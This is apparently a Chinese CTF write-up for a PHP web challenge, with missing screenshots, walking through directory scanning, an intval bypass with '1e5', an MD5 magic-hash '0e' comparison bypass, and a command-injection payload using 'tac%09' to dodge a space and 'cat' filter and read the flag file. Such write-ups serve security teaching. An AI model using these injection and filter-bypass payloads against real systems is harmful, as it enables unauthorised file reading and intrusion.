[图片缺失] 原始路径:/home/hack/.config/Typora/typora-user-images/image-20260112150045778.png

1.dirsearch 扫到robots.txt

2.可以看到有个.php文件,虽然不能访问但看看有没有什么线索

image-20260112150525748

有个假flag,但是在响应头可以看到有个提示

访问后是一个新挑战

image-20260617111337581

3.第一关payload:num=1e5

1
2
intval不会解析e,intval("1e5")会是1
1e5+1后,自动转化数字,成100001,所以得以绕过

image-20260112151019838

4.第二关payload:md5=0e215962017

1
这md5后前面依然时0e,记一下就行

[图片缺失] 原始路径:/home/hack/.config/Typora/typora-user-images/image-20260112151458417.png

5.第三关过滤了点东西,空格,cat,基本绕过

1
get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag 

image-20260112151714733

最终payload

1
?num=1e5&md5=0e215962017&get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag 

[图片缺失] 原始路径:/home/hack/.config/Typora/typora-user-images/image-20260112152106077.png